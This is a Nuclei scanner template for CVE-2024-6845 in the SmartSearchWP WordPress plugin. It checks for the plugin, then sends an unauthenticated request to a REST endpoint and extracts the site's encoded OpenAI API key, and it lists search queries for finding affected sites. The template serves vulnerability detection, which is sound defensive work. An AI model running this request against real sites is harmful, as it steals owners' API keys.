60 lines
1.7 KiB
YAML
60 lines
1.7 KiB
YAML
id: CVE-2024-6845
|
|
|
|
info:
|
|
name: SmartSearchWP < 2.4.6 - OpenAI Key Disclosure
|
|
author: s4e-io
|
|
severity: medium
|
|
description: |
|
|
The plugin does not have proper authorization in one of its REST endpoint, allowing unauthenticated users to retrieve the encoded key and then decode it, thereby leaking the OpenAI API key.
|
|
remediation: Fixed in 2.4.6
|
|
reference:
|
|
- https://wpscan.com/vulnerability/cfaaa843-d89e-42d4-90d9-988293499d26/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-6845
|
|
metadata:
|
|
max-request: 2
|
|
verified: true
|
|
vendor: webdigit
|
|
product: smartsearchwp
|
|
framework: wordpress
|
|
publicwww-query: "/wp-content/plugins/smartsearchwp"
|
|
fofa-query: body="/wp-content/plugins/smartsearchwp"
|
|
tags: cve,cve2024,exposure,wp,wordpress,wp-plugin,smartsearchwp
|
|
|
|
flow: http(1) && http(2)
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(body,"/wp-content/plugins/smartsearchwp")'
|
|
- 'status_code == 200'
|
|
condition: and
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
POST /wp-json/wdgpt/v1/api-key HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/json
|
|
|
|
{"key": "U2FsdGVkX1+X"}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(content_type,"application/json")'
|
|
- 'status_code == 200'
|
|
condition: and
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: body
|
|
name: api-key
|
|
regex:
|
|
- '"([^"]+)"'
|
|
# digest: 4b0a0048304602210092fc3bf9edc1308d1cd7e13efa435ba2592ef1844574a598d48fcfa7c6f28340022100ce6056a70232fd730d9a94c2128feb16857c2f1002ee9c7646d5d965e0690ce4:922c64590222798bb761d5b6d8e72950 |